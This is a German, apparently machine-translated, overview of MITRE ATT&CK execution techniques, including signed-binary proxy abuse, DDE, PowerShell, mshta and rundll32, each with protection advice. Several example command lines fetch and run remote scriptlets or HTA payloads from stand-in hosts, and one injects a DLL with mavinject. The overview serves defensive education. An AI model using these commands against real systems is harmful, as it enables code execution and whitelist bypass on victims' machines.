Ausführung

Links zu allen Teilen:
Teil 1. Erstzugriff erhalten (Erstzugriff)
Teil 2. Ausführung
Teil 3. Befestigung (Persistenz)
Teil 4. Eskalation von Berechtigungen
Teil 5. Verteidigungshinterziehung
Teil 6. Abrufen von Anmeldeinformationen (Zugriff auf Anmeldeinformationen)
Teil 7. Entdeckung
Teil 8. Seitliche Bewegung
Teil 9. Datenerfassung (Erfassung)
Teil 10 Exfiltration
Teil 11. Befehl und Kontrolle

In der Phase „Ausführung“ wird beschrieben, wie Angreifer die Mittel und Methoden der Remote- und lokalen Ausführung verschiedener Angriffe, Skripte und ausführbarer Dateien, die in der vorherigen Phase an das System übermittelt wurden, im angegriffenen System verwenden.

Der Autor ist nicht verantwortlich für die möglichen Konsequenzen der Anwendung der im Artikel aufgeführten Informationen und entschuldigt sich auch für mögliche Ungenauigkeiten in einigen Formulierungen und Begriffen. Die veröffentlichten Informationen sind eine kostenlose Nacherzählung des Inhalts von MITRE ATT & CK.

AppleScript

System: macOS
Rechte: Benutzer
Beschreibung: Die AppleScript-Sprache kann mit Apple Event - Nachrichten arbeiten, die im Rahmen der Interprozesskommunikation (IPC) zwischen Anwendungen ausgetauscht werden. Mit Apple Event können Sie mit fast jeder Anwendung interagieren, die lokal oder remote geöffnet ist, und Ereignisse wie das Öffnen von Fenstern und das Drücken von Tasten auslösen. Skripte werden mit dem folgenden Befehl ausgeführt: Osascript -e <Skript> .
Angreifer können AppleScript verwenden, um SSH-Verbindungen zu Remote-Hosts verdeckt zu öffnen und Benutzern gefälschte Dialoge zu ermöglichen. AppleScript kann auch bei häufigeren Arten von Angriffen verwendet werden, z. B. bei Reverse Shell-Organisationen.

Schutzempfehlungen: Obligatorische Überprüfung der Ausführung von AppleScript-Skripten für die Signatur eines vertrauenswürdigen Entwicklers.

CMSTP (AppLocker ByPass - CMSTP)

System: Windows
Rechte: Benutzer
Beschreibung: Microsoft Connection Manager Profile Installer (cmstp.exe) ist das in Windows integrierte Dienstprogramm " Connection Manager Profile Installer ". Cmstp.exe kann eine Inf-Datei als Parameter verwenden, sodass ein Angreifer eine spezielle böswillige INF zum Herunterladen und Ausführen von DLLs oder Scriptlets (* .sct) von Remoteservern unter Umgehung von AppLocker und anderen Sperren vorbereiten kann, da cmstp.exe mit einem digitalen Microsoft-Zertifikat signiert ist.

Schutzempfehlungen: Blockieren des Starts potenziell gefährlicher Anwendungen. Überwachen von Starts C: \ Windows \ System32 \ cmstp.exe .

Befehlszeilenschnittstelle

System: Windows, Linux, MacOS
Rechte: Benutzer, Administrator, System
Beschreibung: Sie können lokal mit der Befehlszeilenschnittstelle interagieren, über Fernzugriffssoftware, mit Reverse Shell usw. Befehle werden mit der aktuellen Berechtigungsstufe des Befehlszeilenschnittstellenprozesses ausgeführt, wenn der Befehl keinen Aufruf des Prozesses enthält, der die Berechtigungen zum Ausführen des Befehls ändert (z. B. eine geplante Aufgabe).

Sicherheitsempfehlungen: Überprüfen und / oder sperren Sie die Befehlszeile mithilfe von Tools wie AppLocker oder Richtlinien für Softwareeinschränkungen.

Elemente der Systemsteuerung

System: Windows
Rechte: Benutzer, Administrator, System
Beschreibung: Die Taktik besteht darin, die Windows-Systemsteuerungselemente von Angreifern zu verwenden, um beliebige Befehle als Nutzlast auszuführen (z. B. den Reaver- Virus). Schädliche Objekte können als Standardkontrollen getarnt und mithilfe von Phishing-Anhängen an das System übermittelt werden. Dienstprogramme zum Anzeigen und Konfigurieren von Windows-Einstellungen sind registrierte Exe-Dateien und CPL-Dateien von Windows-Systemsteuerungselementen. CPL-Dateien werden tatsächlich in DLLs umbenannt, die auf folgende Arten ausgeführt werden können:

• direkt von der Kommandozeile: control.exe <file.cpl> ;
• Verwenden der API-Funktionen von shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
• Doppelklicken Sie auf die CPL-Datei.

In System32 gespeicherte registrierte CPLs werden automatisch in der Windows-Systemsteuerung angezeigt und haben eine eindeutige Kennung in der Registrierung:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

Informationen zu anderen CPLs, z. B. der Anzeigename und der Pfad zur CPL-Datei, werden in den Abschnitten CPLs und Erweiterte Eigenschaften des Abschnitts gespeichert:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panel

Einige über die Shell gestartete CPLs sind im folgenden Abschnitt registriert:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

Schutzempfehlung: Beschränken Sie den Start und die Speicherung von Elementdateien der Systemsteuerung nur in geschützten Ordnern (z. B. C: \ Windows \ System32 ), aktivieren Sie die Benutzerkontensteuerung (User Account Control, UAC) und AppLocker, um nicht autorisierte Änderungen am System zu verhindern. Natürlich die Verwendung von Antivirensoftware.

DDE (Dynamic Data Exchange Protocol), makroloser Code Exec in MSWord

System: Windows
Rechte: Benutzer
Beschreibung: DDE ist ein Protokoll für die Interaktion von Anwendungen, die Daten und gemeinsam genutzten Speicher für Messaging gemeinsam nutzen. Beispielsweise kann ein Word-Dokument eine Tabelle enthalten, die automatisch aus einem Excel-Dokument aktualisiert wird. Die Technik besteht darin, eine Sicherheitsanfälligkeit in MS Office-Anwendungen auszunutzen, die mit der Verwendung des DDE-Protokolls in MS Office zusammenhängt. Angreifer können Objekte in MS Office-Dokumente einbetten, die Befehle enthalten, die beim Öffnen des Dokuments ausgeführt werden. Beispielsweise kann ein Word-Dokument ein Feldobjekt enthalten, dessen Wert den Befehl {DDEAUTO <Befehl, z. B. c: \ windows \ system32 \ cmd.exe>} angibt, der beim Öffnen des Dokuments ausgeführt wird. Trotz des Relevanzverlusts kann DDE, einschließlich in Windows 10 und MS Office 2016, mithilfe des Schlüssels aktiviert werden:
AllowDDE (DWORD) = 2 im Registrierungsschlüssel:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <Version von Office> \ Word \ Security .

Schutzempfehlungen: Befolgen Sie die Empfehlungen von Microsoft und installieren Sie das entsprechende MS Office-Update . In Windows 10 können Sie auch den ASR- Parameter (Attack Surface Reduction) aktivieren, um sich vor DDE-Angriffen und untergeordneten Prozessen durch MS Office-Anwendungen zu schützen.

Ausführung über API

System: Windows
Rechte: Benutzer, Administrator, System
Beschreibung: Angreifer können die API verwenden, um Binärdateien auszuführen. API-Funktionen wie CreateProcess ermöglichen es Programmen und Skripten, Prozesse durch Angabe der erforderlichen Pfade und Argumente zu starten. API-Funktionen, mit denen Binärdateien ausgeführt werden können:

• CreateProcessA (), CreateProcessW ();
• CreateProcessAsUserA (), CreateProcessAsUserW ();
• CreateProcessInternalA (), CreateProcessInternalW ();
• CreateProcessWithLogonW (), CreateProcessWithTokenW ();
• LoadLibraryA (), LoadLibraryW ();
• LoadLibraryExA (), LoadLibraryExW ();
• LoadModule ();
• LoadPackagedLibrary ();
• WinExec ();
• ShellExecuteA (), ShellExecuteW ();
• ShellExecuteExA (), ShellExecuteExW ().

Schutzempfehlungen: API-Funktionsaufrufe treten häufig auf und sind nur schwer von böswilligen Aktivitäten zu unterscheiden. Der Schutzvektor sollte darauf ausgerichtet sein, den Start der Tools des Angreifers zu Beginn der Angriffskette zu verhindern, böswilliges Verhalten zu erkennen und potenziell gefährliche Software zu blockieren.

Ausführung durch Modulladen

System: Windows
Rechte: Benutzer
Beschreibung: Die Codeausführung kann mit dem Windows-Modullader NTDLL.dll organisiert werden, mit dem die DLL-Bibliothek auf einen beliebigen lokalen oder Netzwerkpfad geladen werden kann. NTDLL.dll ist Teil der Windows-API und kann Funktionen wie CreateProcess () und LoadLibrary () aufrufen .

Schutzempfehlungen: API-Funktionsaufrufe sind reguläre Betriebssystemfunktionen, die sich nur schwer von böswilligen Aktivitäten unterscheiden lassen. Der Schutzvektor muss darauf ausgerichtet sein, den Start der Werkzeuge des Angreifers am Anfang der Angriffskette zu verhindern. Es ist sinnvoll, das Laden von DLLs auf die Verzeichnisse % SystemRoot% und % ProgramFiles% zu beschränken .

Nutzung für die Client-Ausführung

System: Windows, Linux, MacOS
Rechte: Benutzer
Beschreibung: Die Technik umfasst die Remotecodeausführung mithilfe von Exploits in der Benutzersoftware. Das Vorhandensein von Sicherheitslücken in Software wird häufig von Softwareentwicklern mit Verstößen gegen die Anforderungen einer sicheren Programmierung in Verbindung gebracht, was letztendlich zu der Möglichkeit führt, dass die Software unerwartetes Verhalten aufweist.
Betrachten Sie einige Arten von Exploits:

• Browser-Exploits. Webbrowser sind das Ziel, wenn Angreifer Schattenlade- und Phishing-Links verwenden. Das angegriffene System kann über einen normalen Browser kompromittiert werden, nachdem der Benutzer bestimmte Aktionen ausgeführt hat, z. B. über den in der Phishing-E-Mail angegebenen Link.
• Office-Anwendungs-Exploits. Schädliche Dateien werden als Anhänge oder Download-Links übertragen. Um die Sicherheitsanfälligkeit auszunutzen, muss der Benutzer ein Dokument oder eine Datei öffnen, um den Exploit zu starten.
• Anwendungs-Exploits von Drittanbietern. Gängige Anwendungen wie Adobe Reader und Flash, die häufig in Unternehmensumgebungen verwendet werden, werden von Cyberkriminellen angegriffen. Abhängig von der Software und der Art der Sicherheitsanfälligkeit werden Sicherheitsanfälligkeiten in einem Browser ausgenutzt oder wenn ein Benutzer beispielsweise eine Datei öffnet, können Flash-Objekte in MS Office-Dokumenten bereitgestellt werden.

Schutzempfehlungen: Rechtzeitige Installation von Updates für verwendete Anwendungen. Verwendung verschiedener Methoden zur Isolierung potenziell anfälliger Anwendungen - Sandboxen, Mikrosegmentierungs- und Virtualisierungstools, z. B. Sandboxie für Windows und Apparmor, Docker für Linux. Exploit-Schutzsysteme wie Windows Defender Exploit Guard (WDEG) für Windows 10 oder das Enhanced Mitigation Experience Toolkit (EMET) für frühere Windows-Versionen werden ebenfalls empfohlen.

Grafische Benutzeroberfläche

System: Windows, Linux, MacOS
Rechte: Benutzer, Administrator, System
Beschreibung: Eine ausführbare Datei oder ein ausführbares Skript wird gestartet, wenn Sie mit einer Datei über eine grafische Benutzeroberfläche (GUI) in einer interaktiven oder Remote-Sitzung interagieren, z. B. über das RDP-Protokoll.

Sicherheitstipps: Schützen Sie Anmeldeinformationen, mit denen eine Remoteverbindung zum System hergestellt werden kann. Identifizieren Sie unnötige Systemdienstprogramme, Software von Drittanbietern, mit denen Sie in den interaktiven Remote-Modus wechseln können.

InstallUtil

System: Windows
Rechte: Benutzer
Beschreibung: InstallUtil ist ein Windows-Befehlszeilenprogramm, mit dem Anwendungen installiert und deinstalliert werden können, die den .NET Framework-Spezifikationen entsprechen. Installutil wird automatisch mit VisualStudio installiert. Die Datei InstallUtil.exe ist von einem Microsoft-Zertifikat signiert und gespeichert in:
C: \ Windows \ Microsoft.NET \ Framework \ v [Version] \ InstallUtil.exe
Angreifer können die InstallUtil-Funktionalität verwenden, um Proxy-Code auszuführen und Anwendungs-Whitelists zu umgehen.

Schutzempfehlungen : Möglicherweise wird InstallUtil auf Ihrem System nicht verwendet. Blockieren Sie daher möglicherweise die Installation von InstallUtil.exe.

LSASS-Treiber (LSASS-Treiber)

System: Windows
Rechte: Administrator, System
Beschreibung: Local Security Authority (LSA) ist ein Windows-Subsystem, das die Benutzerauthentifizierung bereitstellt. Die LSA enthält mehrere dynamisch miteinander verbundene DLLs, die im Prozess LSASS.exe ausgeführt werden. Angreifer können LSASS.exe angreifen, indem sie unzulässige LSA-Treiber ersetzen oder hinzufügen und dann beliebigen Code ausführen. Die Technik ist in der Pasam- und Wingbird-Malware implementiert, die die modifizierten DLLs, die zum Laden von LSASS verwendet werden, "aufwirft". In diesem Fall wird der Schadcode ausgeführt, bevor die unzulässige DLL einen Absturz und einen anschließenden Absturz des LSASS-Dienstes verursacht.

Schutzempfehlungen: Aktivieren Sie in Windows 8.1 und Windows Server 2012 R2 den LSA-Schutz, indem Sie den Registrierungsschlüssel festlegen:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPL
zu dword Wert : 00000001

Dieser Schutz stellt sicher, dass LSA-geladene Plugins und Treiber von Microsoft digital signiert werden. Aktivieren Sie in Windows 10 und Server 2016 den Windows Defender Credential Guard , um lsass.exe in einer isolierten virtuellen Umgebung auszuführen. Aktivieren Sie den sicheren DLL-Suchmodus, um das Risiko zu verringern, dass schädliche Bibliotheken in lsass.exe geladen werden:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .

Launchctl

System: macOS
Rechte: Benutzer, Administrator
Beschreibung: Launchctl - ein Dienstprogramm zum Verwalten des Launchd-Dienstes. Mit Launchctl können Sie System- und Benutzerdienste (LaunchDeamons und LaunchAgents) verwalten sowie Befehle und Programme ausführen. Launchctl unterstützt Befehlszeilen-Unterbefehle, die interaktiv sind oder von der Standardeingabe umgeleitet werden:
launchctl submit -l [Labelname] - / Path / to / thing / to / execute '' arg "'' arg" '' arg " .
Durch Starten und Neustarten von Diensten und Dämonen können Angreifer Code ausführen und sogar die Whitelist umgehen, wenn launchctl ein autorisierter Prozess ist. Das Laden, Entladen und Neustarten von Diensten und Dämonen erfordert jedoch möglicherweise erhöhte Berechtigungen.

Sicherheitsempfehlungen: Einschränkung der Benutzerrechte zum Erstellen von Startagenten und zum Starten von Startdeamons mithilfe von Gruppenrichtlinien. Mit der KnockKnock- App können Sie Programme ermitteln, die mit launchctl Launch Agents und Launch Deamons verwalten.

Durchführen mit lokaler Jobplanung

System: Linux, MacOS
Rechte: Benutzer, Administrator, root
Beschreibung: Angreifer können in den angegriffenen Systemen Aufgaben zum unbefugten Starten von Programmen erstellen, wenn das System gestartet wird oder nach einem Zeitplan. Linux- und Apple-Systeme unterstützen verschiedene Methoden zum Planen des Starts periodischer Hintergrundaufgaben: cron, at, launchd. Im Gegensatz zum Windows Task Scheduler kann die Taskplanung auf Linux-Systemen nicht remote durchgeführt werden, außer bei Verwendung von Remotesitzungen wie SSH.

Schutzempfehlungen: Einschränkung der Benutzerrechte zum Erstellen geplanter Aufgaben, Blockieren von Systemdienstprogrammen und anderer Software, die zum Planen von Aufgaben verwendet werden kann.

Mshta

System: Windows
Rechte: Benutzer
Beschreibung: Mshta.exe (in C: \ Windows \ System32 \ ) ist ein Dienstprogramm, mit dem Microsoft HTML-Anwendungen (* .HTA) ausgeführt werden. HTA-Anwendungen werden mit denselben Technologien ausgeführt wie InternetExplorer, jedoch außerhalb des Browsers. Aufgrund der Tatsache, dass Mshta Dateien unter Umgehung der Browsersicherheitseinstellungen verarbeitet, können Angreifer mshta.exe verwenden, um die Ausführung von schädlichen HTA-Dateien, Javascript oder VBScript zu vertreten. Die schädliche Datei kann über das integrierte Skript gestartet werden:
mshta vbscript: Close (Execute ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")")))

oder direkt unter der URL:
mshta http [:] // webserver / payload [.] hta

Schutzempfehlungen : Die Funktionalität von mshta.exe ist älteren Versionen von IE zugeordnet, die das Ende ihres Lebenszyklus erreicht haben. Blockieren Sie Mshta.exe, wenn Sie die Funktionalität nicht verwenden.

Powerhell

System: Windows
Rechte: Benutzer, Administrator
Beschreibung: PowerShell (PS) ist eine leistungsstarke interaktive Befehlszeilenschnittstelle und Skriptumgebung, die in Windows enthalten ist. Angreifer können PS verwenden, um Informationen zu sammeln und Code auszuführen. Beispielsweise kann das Cmdlet Start-Process eine ausführbare Datei ausführen, während das Cmdlet Invoke-Command den Befehl lokal oder auf einem Remotecomputer ausführt. PS kann auch zum Herunterladen und Ausführen ausführbarer Dateien aus dem Internet verwendet werden, ohne sie auf Ihrer Festplatte zu speichern. Für Remoteverbindungen mit PS benötigen Sie Administratorrechte. Es gibt eine Reihe von Tools, um PS anzugreifen:

• Reich
• Powersploit
• PSAttack

Schutzempfehlungen: PS kann aus dem System entfernt werden, wenn dies nicht erforderlich ist. Wenn PS erforderlich ist, sollten Administratoren darauf beschränkt sein, es nur durch Ausführen signierter Skripte auszuführen. Deaktivieren Sie den WinRM-Dienst, um die Remote-Ausführung von PS-Skripten zu verhindern. Es sollte beachtet werden, dass es Methoden gibt, um PS-Skriptausführungsrichtlinien zu umgehen .

Regsvcs / regasm

System: Windows
Rechte: Benutzer, Administrator
Beschreibung: Regsvcs und Regasm sind Windows-Dienstprogramme, mit denen Sie sich beim COM-Assemblysystem (.NET Component Object Model) registrieren. Beide Dateien sind von Microsoft digital signiert. Angreifer können Regsvcs und Regasm zur Proxy-Codeausführung verwenden, wenn das Attribut der Code ist, der vor dem Registrieren oder Aufheben der Registrierung ausgeführt werden muss: [ComRegisterFunction] oder [ComUnregisterFunction]. Code mit solchen Attributen kann auch dann gestartet werden, wenn der Prozess mit unzureichenden Berechtigungen ausgeführt wird oder beim Start sogar abstürzt.

Schutzempfehlungen : Blockieren Sie Regsvcs.exe und Regasm.exe, wenn sie nicht in Ihrem System oder Netzwerk verwendet werden.

Regsvr32 (Squiblydoo)

System: Windows
Rechte: Benutzer, Administrator
Beschreibung: Regsvr32.exe ist ein Konsolendienstprogramm zum Registrieren und Aufheben der Registrierung von OLE-Steuerelementen wie ActiveX und DLLs in der Registrierung. Regsvr32.exe ist von Microsoft digital signiert und kann zur Ausführung von Proxy-Code verwendet werden. Mit Regsvr32 können Sie beispielsweise eine XML-Datei herunterladen, die Teile von Java-Code (Scriptlets) enthält, die die weiße Liste umgehen.

Schutzempfehlungen: ASR (Attack Surface Reduction) in EMET und Advanced Theart Protection in Windows Defender können die Verwendung von Regsvr32.exe zur Umgehung von Whitelists blockieren.

Rundll32 (Poweliks)

System: Windows
Rechte: Benutzer
Beschreibung: Rundll32.exe ist ein Systemdienstprogramm zum Starten von Programmen in dynamisch verbundenen Bibliotheken, die aufgerufen werden können, um die Binärdatei zu vertreten und Windows-Steuerdateien (.cpl) über die undokumentierten Funktionen shel32.dll - Control_RunDLL und Control_RunDLLAsUser auszuführen. Durch Doppelklicken auf die CPL-Datei wird auch Rundll32.exe ausgeführt. Rundll32 kann auch zum Ausführen von Skripten wie JavaScript verwendet werden:
rundll32.exe Javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] example [.] com / malicious.sct") "
Die obige Methode zur Verwendung von rundll32.exe wird von Antivirensoftware wie einem Virus wie Poweliks erkannt.
Schutzempfehlungen: ASR (Attack Surface Reduction) in EMET und Advanced Theart Protection in Windows Defender können die Verwendung von Rundll32.exe zur Umgehung der Whitelist blockieren.

Ausführen der geplanten Windows-Aufgabe

System: Windows
Rechte: Benutzer, Administrator, System
Beschreibung: Dienstprogramme wie at, schtasks und Windows Task Scheduler können verwendet werden, um Programme und Skripts so zu planen, dass sie zu einem bestimmten Datum und einer bestimmten Uhrzeit ausgeführt werden. Eine Aufgabe kann auf einem Remote-System geplant werden, vorausgesetzt, RPC wird zur Authentifizierung verwendet und die Drucker- und Dateifreigabe ist aktiviert. Darüber hinaus sind Administratorrechte erforderlich, um Aufgaben auf einem Remote-System zu planen. Angreifer können die Remote-Task-Planung verwenden, um Programme beim Systemstart oder im Kontext eines bestimmten Kontos auszuführen.

Tipps von Schutz: Schalten Sie die Einschränkung der Rechte Arbeitsplätze werden von den Benutzern im Namen des Systems zu schaffen , in der Registrierung:
HKLM \ SYSTEM \ CurrentControlSet \ der Control \ Lsa \ SubmitControl = 0
Hinweis:Mit SubmitControl = 1 können Mitglieder der Gruppe Server Operators Jobs erstellen.

Konfigurieren Sie außerdem das entsprechende Gruppenrichtlinienobjekt:
Computerkonfiguration> [Richtlinien]> Windows-Einstellungen> Sicherheitseinstellungen> Lokale Richtlinien> Sicherheitsoptionen: Domänencontroller: Ermöglichen Sie Serverbetreibern, Aufgaben zu planen: Deaktivierte
Computerkonfiguration> [Richtlinien]> Windows-Einstellungen> Sicherheitseinstellungen> Lokal Richtlinien> Zuweisung von Benutzerrechten:
Erhöhen der Planungspriorität Erwägen Sie in Ihrer Aktivität die Verwendung des PowerSploit Framework, das das PowerUP-Modul zum Auffinden von Schwachstellen bei der Lösung geplanter Aufgaben enthält.

Skripting

System: Windows, Linux, macOS
Rechte: Benutzer
Beschreibung: Angreifer können mithilfe von Skripten ihre Aktionen automatisieren, Betriebsaufgaben beschleunigen und dadurch die für den Zugriff erforderliche Zeit verkürzen. Einige Skriptsprachen können verwendet werden, um die Mechanismen zur Überwachung von Prozessen zu umgehen, indem direkt mit dem Betriebssystem auf API-Ebene interagiert wird, anstatt andere Programme aufzurufen. Skripte können als Makros in Office-Dokumente eingebettet und dann für Phishing-Angriffe verwendet werden. In diesem Fall erwarten die Angreifer, dass der Benutzer die Makrodatei ausführt oder dass der Benutzer der Aktivierung des Makros zustimmt. Es gibt verschiedene gängige Frameworks für die Implementierung von Skripten - Metasploit, Veil, PowerSploit.

Sicherheitstipps: Beschränken Sie den Zugriff auf Skripts wie VBScript oder PowerShell. Konfigurieren Sie unter Windows die MS Office-Sicherheitseinstellungen, indem Sie die sichere Anzeige und das Makroverbot über das Gruppenrichtlinienobjekt aktivieren. Wenn Makros benötigt werden, lassen Sie nur vertrauenswürdige digital signierte Makros laufen. Verwenden Sie Mikrosegmentierung und Anwendungsvirtualisierung, z. B. Sandboxie für Windows und Apparmor, Docker für Linux.

Starten von Diensten (Dienstausführung)

System: Windows-
Rechte: Administrator,
Systembeschreibung: Angreifer können einen Binärcode, einen Befehl oder ein Skript mit speziellen Methoden für die Interaktion mit Windows-Diensten ausführen. Mit dem Service Control Manager (SCM) können Sie beispielsweise neue Dienste erstellen und die ausgeführten ändern.

Schutzempfehlungen:Stellen Sie sicher, dass die aktuelle Berechtigungseinstellung auf dem System den Start von Diensten mit hohen Berechtigungen von Benutzern mit niedrigen Berechtigungen verhindert. Stellen Sie sicher, dass ausführbare Dateien mit hohen Berechtigungen auf dem System nicht von Benutzern mit niedrigeren Berechtigungen ersetzt oder geändert werden können. Erwägen Sie die Verwendung von Tools, um den Start potenziell gefährlicher Programme mithilfe von AppLocker einzuschränken und Richtlinien für Softwareeinschränkungen zu konfigurieren .

Ausführung durch signierte binäre Proxy-Ausführung

System: Windows
Rechte: Benutzer
Beschreibung: Mit vertrauenswürdigen digitalen Zertifikaten signierte Binärdateien können auf Windows-Systemen ausgeführt werden, die durch die Überprüfung der digitalen Signatur geschützt sind. Mehrere Microsoft-Dateien, die während der Installation von Windows standardmäßig signiert wurden, können als Proxy für den Start anderer Dateien verwendet werden:
Mavinject.exe ist ein Windows-Dienstprogramm, mit dem Code ausgeführt werden kann. Mavinject kann verwendet werden, um die DLL in den laufenden Prozess einzugeben:
"C: \ Programme \ Gemeinsame Dateien \ Microsoft Shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH-DLL]
C: \ Windows \ System32 \ mavinject.exe [PID ] / INJECTRUNNING [PATH DLL]
SyncAppvPublishingServer.exe- kann verwendet werden, um Powershell-Skripte auszuführen, ohne Powershell.exe auszuführen.
Es gibt mehrere ähnliche Binärdateien .

Schutzempfehlungen: Viele signierte Dateien werden möglicherweise nicht auf Ihrem System verwendet. Blockieren Sie daher deren Start.

Ausführung durch signierte Skripte (Proxy-Ausführung für signierte Skripte)

System: Windows-
Rechte: Benutzer
Beschreibung: Mit vertrauenswürdigen Zertifikaten signierte Skripts können zum Proxy schädlicher Dateien verwendet werden. PubPrn.vbs ist beispielsweise mit einem Microsoft-Zertifikat signiert und kann zum Ausführen einer Datei von einem
Remoteserver verwendet werden: cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs 127.0.0.1-Skript: http [:] // 192.168.1.100/hi.png Schutzempfehlungen

: Solche signierten Skripte sind auf Ihrem System möglicherweise nicht erforderlich. Blockieren Sie daher den Start.

Quellenteam

System: Linux und macOS
Rechte: Benutzer
Beschreibung: Source ist ein Befehl, mit dem Sie alle Befehle aus der angegebenen Datei in der aktuellen Befehlsshell lesen und ausführen können. Dies bedeutet, dass alle angegebenen Umgebungsvariablen in allen Skripten und Befehlen sichtbar sind, die gestartet werden. Die Quelle kann auf zwei Arten gestartet werden:
source / path / to / filename [Argumente] oder . / path / to / filename [Argumente]
Beachten Sie das Leerzeichen nach dem Punkt. Ohne Leerzeichen wird das Programm in einer neuen Befehlsshell gestartet. Angreifer können Source verwenden, um Dateien auszuführen, die nicht mit dem Flag „x“ als ausführbare Dateien gekennzeichnet sind.

Schutzempfehlungen: Die Verhinderung der Verwendung von im System integrierten Befehlen ist aufgrund ihrer Rechtmäßigkeit recht schwierig. Daher muss der Schutzvektor darauf ausgerichtet sein, böswillige Aktionen in früheren Phasen des Angriffs zu verhindern, z. B. in der Phase der Übermittlung oder Erstellung einer schädlichen Datei im System.

Leerzeichen nach Dateiname

System: Linux, macOS
Rechte: Benutzer
Beschreibung:Angreifer können den wahren Dateityp ausblenden, indem sie ihre Erweiterung ändern. Bei bestimmten Dateitypen (funktioniert nicht mit .app-Dateien) ändert das Hinzufügen eines Leerzeichens am Ende des Dateinamens die Art und Weise, wie die Datei vom Betriebssystem verarbeitet wird. Wenn beispielsweise eine ausführbare Datei Mach-O mit dem Namen evil.bin vorhanden ist, startet das Betriebssystem beim Doppelklicken des Benutzers Terminal.app und führt sie aus. Wenn dieselbe Datei in evil.txt umbenannt wird, wird sie mit einem Doppelklick in einem Texteditor gestartet. Wenn die Datei jedoch in "evil.txt" (Leerzeichen am Ende) umbenannt wird, wird durch Doppelklicken auf den Typ der wahren Datei das Betriebssystem bestimmt und die Binärdatei gestartet. Angreifer können diese Technik verwenden, um einen Benutzer zum Starten einer schädlichen ausführbaren Datei zu verleiten.

Schutzempfehlungen:Die Verwendung dieser Technik ist schwer zu verhindern, weil Ein Angreifer verwendet Standardbetriebsmechanismen des Betriebssystems. Daher muss der Schutzvektor darauf abzielen, böswillige Aktionen in früheren Phasen des Angriffs zu verhindern, z. B. in der Phase der Bereitstellung oder Erstellung einer schädlichen Datei im System.

Ausführung mit Netzwerkverwaltungssoftware von Drittanbietern (Software von Drittanbietern)

System: Windows, Linux, macOS
Rechte: Benutzer, Administrator,
Systembeschreibung: Der Angriffsvektor richtet sich an Software und Softwarebereitstellungssysteme von Drittanbietern, die im angegriffenen Netzwerk zu Verwaltungszwecken verwendet werden (SCCM, VNC, HBSS, Altris usw.). Wenn ein Angreifer Zugriff auf solche Systeme erhält, kann der Gegner Code auf allen mit dem Softwarebereitstellungssystem verbundenen Hosts remote ausführen. Die zur Implementierung dieser Technik erforderlichen Rechte hängen von der jeweiligen Systemkonfiguration ab. Lokale Anmeldeinformationen können ausreichen, um auf den Softwarebereitstellungsserver zuzugreifen. Zum Starten der Softwarebereitstellung ist jedoch möglicherweise ein Administratorkonto erforderlich.

Schutzempfehlungen:Überprüfen Sie die Sicherheitsstufe Ihrer Softwarebereitstellungssysteme. Stellen Sie sicher, dass der Zugriff auf Softwareverwaltungssysteme eingeschränkt, kontrolliert und geschützt ist. Verwenden Sie strikt die obligatorischen Vorabgenehmigungsrichtlinien für die Remote-Softwarebereitstellung. Bieten Sie einer begrenzten Anzahl von Administratoren Zugriff auf Softwarebereitstellungssysteme, und stellen Sie die Isolation des Softwarebereitstellungssystems sicher. Stellen Sie sicher, dass die Anmeldeinformationen für den Zugriff auf das Softwarebereitstellungssystem eindeutig sind und nicht in anderen Diensten im Unternehmensnetzwerk verwendet werden. Wenn das Softwarebereitstellungssystem so konfiguriert ist, dass nur signierte Binärdateien ausgeführt werden, stellen Sie sicher, dass vertrauenswürdige Zertifikate nicht im Softwarebereitstellungssystem selbst gespeichert sind, sondern sich auf einem System befinden, auf das nicht remote zugegriffen werden kann.

Fallen-Team

System: Linux, macOS
Rechte: Benutzer, Administrator
Beschreibung: Mit dem Befehl trap wird das Skript vor Unterbrechungen (Strg + C, Strg + D, Strg + Z usw.) geschützt. Wenn das Skript ein Interrupt-Signal empfängt, das in den Argumenten des Trap-Befehls angegeben ist, verarbeitet es das Interrupt-Signal selbstständig, während die Shell ein solches Signal nicht verarbeitet. Angreifer können Trap verwenden, um Code zu registrieren, der ausgeführt wird, wenn die Shell bestimmte Interrupt-Signale empfängt.

Schutzempfehlungen:Die Verwendung dieser Technik ist schwer zu verhindern, da der Angreifer die Standardmechanismen des Betriebssystems verwendet. Der Schutzvektor sollte darauf abzielen, böswillige Aktionen in früheren Phasen des Angriffs zu verhindern, z. B. in der Phase der Übermittlung oder Erstellung einer schädlichen Datei im System.

Ausführen durch vertrauenswürdige Entwicklerdienstprogramme

System: Windows-
Rechte: Benutzerbeschreibung
: Es gibt viele Dienstprogramme, die von Softwareentwicklern verwendet werden und zum Ausführen von Code in verschiedenen Formen beim Entwickeln, Debuggen und Reverse Engineering von Software verwendet werden können. Diese Dienstprogramme sind häufig mit digitalen Zertifikaten signiert, mit denen sie schädlichen Code im Betriebssystem übertragen können, wobei Sicherheitsmechanismen und weiße Anwendungsblätter umgangen werden.

MsbulidIst eine Softwareentwicklungsplattform, die in Visual Studio verwendet wird. Es werden Projekte in Form von XML-Dateien verwendet, die die Anforderungen für die Erstellung verschiedener Plattformen und Konfigurationen beschreiben. Mit MSBuild aus .NET Version 4 können Sie C # -Code in ein XML-Projekt einfügen, kompilieren und anschließend ausführen. MSBulid.exe ist vom Microsoft Digital Certificate signiert.
DNX - .Net Execution Environmant (dnx.exe) ist ein Entwicklungskit für Visual Studio Enterprise. Seit der .NET Core CLI im Jahr 2016 eingestellt. DNX fehlt in Standard-Windows-Builds und kann nur auf Entwicklerhosts vorhanden sein, wenn .Net Core und ASP.NET Core 1.0 verwendet werden. Dnx.exe ist digital signiert und kann zur Ausführung von Proxy-Code verwendet werden.
